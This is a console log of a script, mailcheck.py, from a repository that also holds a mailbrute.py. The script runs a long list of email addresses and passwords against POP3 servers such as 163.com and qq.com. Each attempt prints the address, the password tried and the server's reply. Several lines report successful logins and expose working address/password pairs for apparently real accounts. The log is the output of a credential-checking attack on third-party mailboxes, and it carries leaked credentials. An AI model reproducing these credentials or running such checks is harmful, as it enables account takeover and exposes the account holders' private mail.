

D:\work\gitdir\sscript (master)
λ ls
README.md  __init__.py*  lib/  mailbrute.py*  mailcheck.py*  maillist.txt  result

D:\work\gitdir\sscript (master)
λ python mailcheck.py maillist.txt
[+] checking 'zhongwm0027@163.com' 'zhongwm123' 'pop3.163.com'
[!] chekcing zhongwm0027@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0035@163.com' 'sutu3216' 'pop3.163.com'
[!] chekcing zhongwm0035@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0042@163.com' 'sutu3211' 'pop3.163.com'
[!] chekcing zhongwm0042@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0044@163.com' 'sutu3209' 'pop3.163.com'
[!] chekcing zhongwm0044@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0046@163.com' 'zhongwm4005' 'pop3.163.com'
[!] chekcing zhongwm0046@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0054@163.com' 'zhongwm123' 'pop3.163.com'
[!] chekcing zhongwm0054@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0067@163.com' 'zhongwm067' 'pop3.163.com'
[!] chekcing zhongwm0067@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0068@163.com' 'zhongwm068' 'pop3.163.com'
[!] chekcing zhongwm0068@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0069@163.com' 'zhongwm069' 'pop3.163.com'
[!] chekcing zhongwm0069@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0085@163.com' 'zhongwm085' 'pop3.163.com'
[!] chekcing zhongwm0085@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0093@163.com' 'zhongwm793' 'pop3.163.com'
[!] chekcing zhongwm0093@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0094@163.com' 'zhongwm794' 'pop3.163.com'
[!] chekcing zhongwm0094@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm0097@163.com' 'zhongwm597' 'pop3.163.com'
[!] success, user is zhongwm0097@163.com, password is zhongwm597
[+] checking 'zhongwm0102@163.com' 'zhongwm201' 'pop3.163.com'
[!] chekcing zhongwm0102@163.com failed, reason:-ERR Unable to log on
[+] checking '2103073425@qq.com' 'wangdao123' 'pop.qq.com'
[!] chekcing 2103073425@qq.com failed, reason:-ERR 登录失败，请使用安全连接（如ssl），详细说明请查看: http://service.mail.qq.com/cgi-bin/help?id=28
[+] checking '1628018641@qq.com' 'wangdao123' 'pop.qq.com'
[!] chekcing 1628018641@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking '2663706350@qq.com' 'dongtianle' 'pop.qq.com'
[!] chekcing 2663706350@qq.com failed, reason:-ERR 登录失败，请使用安全连接（如ssl），详细说明请查看: http://service.mail.qq.com/cgi-bin/help?id=28
[+] checking 'zhongwm0065@163.com' 'zhongwm765' 'pop3.163.com'
[!] chekcing zhongwm0065@163.com failed, reason:-ERR Unable to log on
[+] checking 'wangdzx109@163.com' 'wang109' 'pop3.163.com'
[!] chekcing wangdzx109@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu1000@163.com' 'sutu123' 'pop3.163.com'
[!] success, user is sutu1000@163.com, password is sutu123
[+] checking 'zhongwm012@163.com' 'zhongwm123' 'pop3.163.com'
[!] chekcing zhongwm012@163.com failed, reason:-ERR Unable to log on
[+] checking 'wangdzx102@163.com' 'wang102' 'pop3.163.com'
[!] success, user is wangdzx102@163.com, password is wang102
[+] checking 'zhongwm100@ehanlin.com' 'sootoo3601' '123.108.216.97'
[!] chekcing zhongwm100@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'tongcica@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing tongcica@163.com failed, reason:-ERR Unable to log on
[+] checking 'isjsongjia@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing isjsongjia@163.com failed, reason:-ERR Unable to log on
[+] checking 'yingdijiangwen@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing yingdijiangwen@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu0028@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu0028@163.com failed, reason:-ERR Unable to log on
[+] checking 'xiaoliduohai@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing xiaoliduohai@163.com failed, reason:-ERR Unable to log on
[+] checking 'geyouyingmi@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing geyouyingmi@163.com failed, reason:-ERR Unable to log on
[+] checking '2378823597@qq.com' 'sutu123' 'pop.qq.com'
[!] chekcing 2378823597@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking 'mei_qinlan@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing mei_qinlan@163.com failed, reason:-ERR Unable to log on
[+] checking '1487940995@qq.com' 'sutu123' 'pop.qq.com'
[!] chekcing 1487940995@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking 'sutu00072@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00072@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu0000@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu0000@163.com failed, reason:-ERR Unable to log on
[+] checking 'v_sunhonglei@163.com' 'a123456=' 'pop3.163.com'
[!] success, user is v_sunhonglei@163.com, password is a123456=
[+] checking 'sutu00075@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00075@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu0002@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu0002@163.com failed, reason:-ERR Unable to log on
[+] checking 'izhangjiani@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing izhangjiani@163.com failed, reason:-ERR Unable to log on
[+] checking 'shuchang_fans@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing shuchang_fans@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu0001@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu0001@163.com failed, reason:-ERR Unable to log on
[+] checking 'ichenzihan@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing ichenzihan@163.com failed, reason:-ERR Unable to log on
[+] checking 'andyismee@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing andyismee@163.com failed, reason:-ERR Unable to log on
[+] checking 'zyj_haonan@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing zyj_haonan@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00079@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00079@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00068@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00068@163.com failed, reason:-ERR Unable to log on
[+] checking 'huohua_she@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing huohua_she@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhengjiayingkc@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing zhengjiayingkc@163.com failed, reason:-ERR Unable to log on
[+] checking 'v_gongli@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing v_gongli@163.com failed, reason:-ERR Unable to log on
[+] checking 'iwenle@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing iwenle@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00065@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00065@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00066@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00066@163.com failed, reason:-ERR Unable to log on
[+] checking 'ich_nhao@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing ich_nhao@163.com failed, reason:-ERR Unable to log on
[+] checking 'ruanjingt_an@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing ruanjingt_an@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00002@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00002@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00062@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00062@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00040@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00040@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00054@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00054@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00041@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00041@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00078@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00078@163.com failed, reason:-ERR Unable to log on
[+] checking 'feng_xiaogong@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing feng_xiaogong@163.com failed, reason:-ERR Unable to log on
[+] checking 'meisongzuying@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing meisongzuying@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu0033@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu0033@163.com failed, reason:-ERR Unable to log on
[+] checking 'mi_chenhao@163.com' 'a123456=' 'pop3.163.com'
[!] chekcing mi_chenhao@163.com failed, reason:-ERR Unable to log on
[+] checking '2695578026@qq.com' 'sutu123' 'pop.qq.com'
[!] chekcing 2695578026@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking 'sutu0021@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu0021@163.com failed, reason:-ERR Unable to log on
[+] checking 'sutu00082@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing sutu00082@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm050@vmeti.com' 'zhongwm123' 'vmeti.com'
[!] chekcing zhongwm050@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm051@vmeti.com' 'zhongwm2736' 'vmeti.com'
[!] chekcing zhongwm051@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm052@vmeti.com' 'zhongwm5917' 'vmeti.com'
[!] chekcing zhongwm052@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm053@vmeti.com' 'sootoo2907' 'vmeti.com'
[!] chekcing zhongwm053@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm054@vmeti.com' 'zhongwm7846' 'vmeti.com'
[!] chekcing zhongwm054@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm055@vmeti.com' 'sootoo2691' 'vmeti.com'
[!] chekcing zhongwm055@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm056@vmeti.com' 'zhongwm123' 'vmeti.com'
[!] chekcing zhongwm056@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm057@vmeti.com' 'wangzhidao369' 'vmeti.com'
[!] chekcing zhongwm057@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm058@vmeti.com' 'zhongwm7534' 'vmeti.com'
[!] chekcing zhongwm058@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm059@vmeti.com' 'zhongwm123' 'vmeti.com'
[!] chekcing zhongwm059@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm060@vmeti.com' 'zhongwm1873' 'vmeti.com'
[!] chekcing zhongwm060@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm061@vmeti.com' 'sootoo7364' 'vmeti.com'
[!] chekcing zhongwm061@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm062@vmeti.com' 'zhongwm7458' 'vmeti.com'
[!] chekcing zhongwm062@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm063@vmeti.com' 'sootoo5347' 'vmeti.com'
[!] chekcing zhongwm063@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm064@vmeti.com' 'zhongwm123' 'vmeti.com'
[!] chekcing zhongwm064@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm065@vmeti.com' 'zhongwm8527' 'vmeti.com'
[!] chekcing zhongwm065@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm066@vmeti.com' 'zhongwm2854' 'vmeti.com'
[!] chekcing zhongwm066@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm067@vmeti.com' 'zhongwm7816' 'vmeti.com'
[!] chekcing zhongwm067@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm068@vmeti.com' 'sootoo4549' 'vmeti.com'
[!] chekcing zhongwm068@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm069@vmeti.com' 'zhongwm1723' 'vmeti.com'
[!] chekcing zhongwm069@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm070@vmeti.com' 'sootoo8425' 'vmeti.com'
[!] chekcing zhongwm070@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm071@vmeti.com' 'zhongwm123' 'vmeti.com'
[!] chekcing zhongwm071@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm072@vmeti.com' 'zhongwm2493' 'vmeti.com'
[!] chekcing zhongwm072@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm073@vmeti.com' 'sootoo3761' 'vmeti.com'
[!] chekcing zhongwm073@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm074@vmeti.com' 'zhongwm123' 'vmeti.com'
[!] chekcing zhongwm074@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm075@vmeti.com' 'zhongwm8384' 'vmeti.com'
[!] chekcing zhongwm075@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm076@vmeti.com' 'sootoo9634' 'vmeti.com'
[!] chekcing zhongwm076@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm077@vmeti.com' 'zhongwm8047' 'vmeti.com'
[!] chekcing zhongwm077@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm078@vmeti.com' 'zhongwm2679' 'vmeti.com'
[!] chekcing zhongwm078@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm079@vmeti.com' 'zhongwm6123' 'vmeti.com'
[!] chekcing zhongwm079@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm080@vmeti.com' 'sutu3217' 'vmeti.com'
[!] chekcing zhongwm080@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm081@vmeti.com' 'sutu3215' 'vmeti.com'
[!] chekcing zhongwm081@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm082@vmeti.com' 'sootoo1746' 'vmeti.com'
[!] chekcing zhongwm082@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm083@vmeti.com' 'sutu3213' 'vmeti.com'
[!] chekcing zhongwm083@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm084@vmeti.com' 'zhongwm8419' 'vmeti.com'
[!] chekcing zhongwm084@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm085@vmeti.com' 'zhongwm123' 'vmeti.com'
[!] chekcing zhongwm085@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm086@vmeti.com' 'sutu3210' 'vmeti.com'
[!] chekcing zhongwm086@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm087@vmeti.com' 'sutu8888' 'vmeti.com'
[!] chekcing zhongwm087@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm088@vmeti.com' 'sutu3208' 'vmeti.com'
[!] chekcing zhongwm088@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm089@vmeti.com' 'sutu3206' 'vmeti.com'
[!] chekcing zhongwm089@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm001@netwayer.com' 'sutu3205' 'netwayer.com'
[!] chekcing zhongwm001@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm002@netwayer.com' 'sutu3204' 'netwayer.com'
[!] chekcing zhongwm002@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm003@netwayer.com' 'sutu321321' 'netwayer.com'
[!] chekcing zhongwm003@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm004@netwayer.com' 'sutu3287' 'netwayer.com'
[!] chekcing zhongwm004@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm005@netwayer.com' 'sutu3288' 'netwayer.com'
[!] chekcing zhongwm005@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm006@netwayer.com' 'sutu3327' 'netwayer.com'
[!] chekcing zhongwm006@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm007@netwayer.com' 'sootoo7352' 'netwayer.com'
[!] chekcing zhongwm007@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm008@netwayer.com' 'sutu123' 'netwayer.com'
[!] chekcing zhongwm008@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm061@ehanlin.com' 'zhongwm2419' '123.108.216.97'
[!] chekcing zhongwm061@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm009@netwayer.com' 'zhongwm7624' 'netwayer.com'
[!] chekcing zhongwm009@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm010@netwayer.com' 'zhongwm4378' 'netwayer.com'
[!] chekcing zhongwm010@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm011@netwayer.com' 'zhongwm6527' 'netwayer.com'
[!] chekcing zhongwm011@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm012@netwayer.com' 'zhongwm1841' 'netwayer.com'
[!] chekcing zhongwm012@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm013@netwayer.com' 'sootoo7628' 'netwayer.com'
[!] chekcing zhongwm013@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm014@netwayer.com' 'zhongwm918' 'netwayer.com'
[!] chekcing zhongwm014@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm015@netwayer.com' 'zhongwm988' 'netwayer.com'
[!] chekcing zhongwm015@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm016@netwayer.com' 'zhongwm618' 'netwayer.com'
[!] chekcing zhongwm016@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm017@netwayer.com' 'zhongwm678' 'netwayer.com'
[!] chekcing zhongwm017@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm018@netwayer.com' 'zhongwm765' 'netwayer.com'
[!] chekcing zhongwm018@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm019@netwayer.com' 'sootoo123' 'netwayer.com'
[!] chekcing zhongwm019@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm020@netwayer.com' 'sootoods' 'netwayer.com'
[!] chekcing zhongwm020@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm021@netwayer.com' 'wangzhidao111' 'netwayer.com'
[!] chekcing zhongwm021@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm022@netwayer.com' 'zhongwm3321' 'netwayer.com'
[!] chekcing zhongwm022@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm023@netwayer.com' 'zhongwm274' 'netwayer.com'
[!] chekcing zhongwm023@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm024@netwayer.com' 'zhongwm975' 'netwayer.com'
[!] chekcing zhongwm024@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm0076@163.com' 'zhongwm176' 'pop3.163.com'
[!] success, user is zhongwm0076@163.com, password is zhongwm176
[+] checking 'zhongwm0077@163.com' 'zhongwm777' 'pop3.163.com'
[!] success, user is zhongwm0077@163.com, password is zhongwm777
[+] checking 'zhongwm025@netwayer.com' 'zhongwm978' 'netwayer.com'
[!] chekcing zhongwm025@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm026@netwayer.com' 'zhongwm179' 'netwayer.com'
[!] chekcing zhongwm026@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm027@netwayer.com' 'zhongwm680' 'netwayer.com'
[!] chekcing zhongwm027@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm028@netwayer.com' 'zhongwm481' 'netwayer.com'
[!] chekcing zhongwm028@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm029@netwayer.com' 'zhongwm582' 'netwayer.com'
[!] chekcing zhongwm029@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm030@netwayer.com' 'zhongwm383' 'netwayer.com'
[!] chekcing zhongwm030@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm031@netwayer.com' 'zhongwm484' 'netwayer.com'
[!] chekcing zhongwm031@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm032@netwayer.com' 'zhongwm786' 'netwayer.com'
[!] chekcing zhongwm032@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm033@netwayer.com' 'zhongwm567' 'netwayer.com'
[!] chekcing zhongwm033@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm034@netwayer.com' 'zhongwm333' 'netwayer.com'
[!] chekcing zhongwm034@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm035@netwayer.com' 'zhongwm189' 'netwayer.com'
[!] chekcing zhongwm035@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm036@netwayer.com' 'zhongwm290' 'netwayer.com'
[!] chekcing zhongwm036@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm037@netwayer.com' 'zhongwm391' 'netwayer.com'
[!] chekcing zhongwm037@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm038@netwayer.com' 'zhongwm788' 'netwayer.com'
[!] chekcing zhongwm038@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm039@netwayer.com' 'zhongwm796' 'netwayer.com'
[!] chekcing zhongwm039@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm040@netwayer.com' 'zhongwm198' 'netwayer.com'
[!] chekcing zhongwm040@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm041@netwayer.com' 'zhongwm299' 'netwayer.com'
[!] chekcing zhongwm041@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm042@netwayer.com' 'zhongwm001' 'netwayer.com'
[!] chekcing zhongwm042@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm043@netwayer.com' 'zhongwm101' 'netwayer.com'
[!] chekcing zhongwm043@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm044@netwayer.com' 'zhongwm013' 'netwayer.com'
[!] chekcing zhongwm044@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm045@netwayer.com' 'zhongwm789' 'netwayer.com'
[!] chekcing zhongwm045@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm046@netwayer.com' 'sootoosz' 'netwayer.com'
[!] chekcing zhongwm046@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm047@netwayer.com' 'woaizwm2013' 'netwayer.com'
[!] chekcing zhongwm047@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm048@netwayer.com' 'sutuyanjiuyuan' 'netwayer.com'
[!] chekcing zhongwm048@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm049@netwayer.com' '2012sootoo' 'netwayer.com'
[!] chekcing zhongwm049@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm050@netwayer.com' '2011sootoo' 'netwayer.com'
[!] chekcing zhongwm050@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm051@netwayer.com' 'lmh957208069' 'netwayer.com'
[!] chekcing zhongwm051@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm052@netwayer.com' 'sootoo1878' 'netwayer.com'
[!] chekcing zhongwm052@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm062@ehanlin.com' 'sutu6188' '123.108.216.97'
[!] chekcing zhongwm062@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm053@netwayer.com' 'zhongwm0974' 'netwayer.com'
[!] chekcing zhongwm053@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm063@ehanlin.com' 'zhongwm3841' '123.108.216.97'
[!] chekcing zhongwm063@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'babyjianqiao1@163.com' 'sutu123' 'pop3.163.com'
[!] chekcing babyjianqiao1@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm054@netwayer.com' 'zhongwm2801' 'netwayer.com'
[!] chekcing zhongwm054@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm055@netwayer.com' 'sootootmy' 'netwayer.com'
[!] chekcing zhongwm055@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm056@netwayer.com' 'sootoosz' 'netwayer.com'
[!] chekcing zhongwm056@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm057@netwayer.com' 'sootoosz' 'netwayer.com'
[!] chekcing zhongwm057@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm058@netwayer.com' 'zhongwm9451' 'netwayer.com'
[!] chekcing zhongwm058@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm064@ehanlin.com' 'sootoo6378' '123.108.216.97'
[!] chekcing zhongwm064@ehanlin.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm059@netwayer.com' 'sootoo6817' 'netwayer.com'
[!] chekcing zhongwm059@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm091@vmeti.com' 'sootoo7878' 'vmeti.com'
[!] chekcing zhongwm091@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm060@netwayer.com' 'hcysootoo123' 'netwayer.com'
[!] chekcing zhongwm060@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm061@netwayer.com' 'wangpei4132299' 'netwayer.com'
[!] chekcing zhongwm061@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm062@netwayer.com' 'wangpei4132299' 'netwayer.com'
[!] chekcing zhongwm062@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm063@netwayer.com' 'wangpei4132299' 'netwayer.com'
[!] chekcing zhongwm063@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking '378474495@qq.com' 'wangpei4132299' 'pop.qq.com'
[!] chekcing 378474495@qq.com failed, reason:-ERR 登录失败，请使用安全连接（如ssl），详细说明请查看: http://service.mail.qq.com/cgi-bin/help?id=28
[+] checking 'zhongwm068@netwayer.com' 'wangpei777' 'netwayer.com'
[!] chekcing zhongwm068@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm066@netwayer.com' 'sootoo' 'netwayer.com'
[!] chekcing zhongwm066@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm121@netwayer.com' 'sootoo6618' 'netwayer.com'
[!] chekcing zhongwm121@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'dingds@sootoo.com' 'weixindingds' 'mail.sootoo.com'
[!] chekcing dingds@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'jijingtao1221@163.com' '2011sootoo' 'pop3.163.com'
[!] chekcing jijingtao1221@163.com failed, reason:-ERR Unable to log on
[+] checking 'zhaohehong@foxmail.com' 'ysz5271314' 'pop.qq.com'
[!] chekcing zhaohehong@foxmail.com failed, reason:-ERR 登录失败，请使用安全连接（如ssl），详细说明请查看: http://service.mail.qq.com/cgi-bin/help?id=28
[+] checking '1587921328@qq.com' 'lmhseow.com' 'pop.qq.com'
[!] chekcing 1587921328@qq.com failed, reason:-ERR 登录失败，请使用安全连接（如ssl），详细说明请查看: http://service.mail.qq.com/cgi-bin/help?id=28
[+] checking '1492088911@qq.com' '1234567890qqq' 'pop.qq.com'
[!] chekcing 1492088911@qq.com failed, reason:-ERR 登录失败，邮箱未开通，login failed
[+] checking 'wangpei413229@163.com' 'wangpei777' 'pop3.163.com'
[!] success, user is wangpei413229@163.com, password is wangpei777
[+] checking 'yanchen_1969@163.com' 'cx1051220064' 'pop3.163.com'
[!] success, user is yanchen_1969@163.com, password is cx1051220064
[+] checking 'lixm@sootoo.com' '2013sootoo' 'mail.sootoo.com'
[!] chekcing lixm@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'wangjin@sootoo.com' '2013sootoo' 'mail.sootoo.com'
[!] chekcing wangjin@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm071@netwayer.com' 'wangzhidao123' 'netwayer.com'
[!] chekcing zhongwm071@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm072@netwayer.com' 'wangzd222' 'netwayer.com'
[!] chekcing zhongwm072@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm073@netwayer.com' 'wangzhidao3311' 'netwayer.com'
[!] chekcing zhongwm073@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm074@netwayer.com' 'abc33211' 'netwayer.com'
[!] chekcing zhongwm074@netwayer.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm075@netwayer.com' 'wangzhidao111' 'netwayer.com'
[!] chekcing zhongwm075@netwayer.com failed, reason:-ERR Authentication failed.
